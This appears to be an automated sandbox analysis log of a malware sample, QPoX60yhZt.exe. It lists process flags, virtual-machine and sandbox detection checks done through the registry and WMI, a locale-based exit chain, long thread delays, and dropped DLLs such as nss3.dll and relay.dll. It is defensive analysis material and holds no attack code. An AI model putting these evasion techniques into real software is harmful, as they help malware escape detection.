Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\u5mc.2\run.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\u5mc.2\run.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Checks if the current machine is a virtual machine (disk enumeration)

Source: C:\Users\user\AppData\Local\Temp\u5mc.3.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5mc.3.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5mc.3.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5mc.3.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5mc.3.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5mc.3.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5mc.3.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5mc.3.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5mc.3.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5mc.3.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5mc.3.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5mc.3.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior

Found evasive API chain (may stop execution after checking locale)

Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe

Evasive API call chain: GetUserDefaultLangID, ExitProcess

graph_1-79344

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : associators of {\\user-PC\root\cimv2:Win32_DiskPartition.DeviceID="Disk #0, Partition #1"} where resultclass = Win32_DiskDrive
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_DiskDriveToDiskPartition where Dependent="Win32_DiskPartition.DeviceID=\"Disk #0, Partition #1\""

Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)

Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk where DeviceId = 'C:'
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : associators of {\\user-PC\ROOT\cimv2:Win32_LogicalDisk.DeviceID="C:"} where resultclass = Win32_DiskPartition
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_LogicalDiskToPartition where Dependent="Win32_LogicalDisk.DeviceID=\"C:\""

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Memory allocated: 2970000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Memory allocated: 2B10000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Memory allocated: 4B10000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Memory allocated: 1950BBE0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Memory allocated: 19523CA0000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Memory allocated: 1610000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Memory allocated: 3020000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Memory allocated: 1610000 memory reserve \| memory write watch

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Window / User API: threadDelayed 5231
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Window / User API: threadDelayed 3994
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Window / User API: threadDelayed 3182
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Window / User API: threadDelayed 6478
Source: C:\Users\user\AppData\Local\Temp\BAEBFIIECB.exe	Window / User API: threadDelayed 7910
Source: C:\Users\user\AppData\Local\Temp\BAEBFIIECB.exe	Window / User API: threadDelayed 2088

Source: C:\Users\user\Desktop\QPoX60yhZt.exe

Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)

graph_0-39176

Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Dropped PE file which has not been started: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u5mc.2\run.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\SecureClient\relay.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\hwfesovsnabgua	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\u5mc.2\relay.dll	Jump to dropped file
